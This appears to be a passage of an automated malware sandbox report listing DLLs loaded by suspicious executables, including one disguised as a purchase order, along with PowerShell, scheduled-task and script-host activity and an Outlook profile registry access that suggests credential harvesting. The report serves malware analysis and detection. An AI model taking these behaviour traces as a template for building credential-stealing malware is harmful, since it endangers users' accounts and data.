Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptbase.dll

Source: C:\Windows\System32\AppVClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\server01.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: PO #09465610_GQ 003745_SO-242000846.exe

Static file information: File size 1851904 > 1048576

Source: PO #09465610_GQ 003745_SO-242000846.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2053758653.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
Source:	Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source:	Binary string: _.pdb source: RegSvcs.exe, 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2290135083.000000000398F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2847166658.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2933295512.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2911797634.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
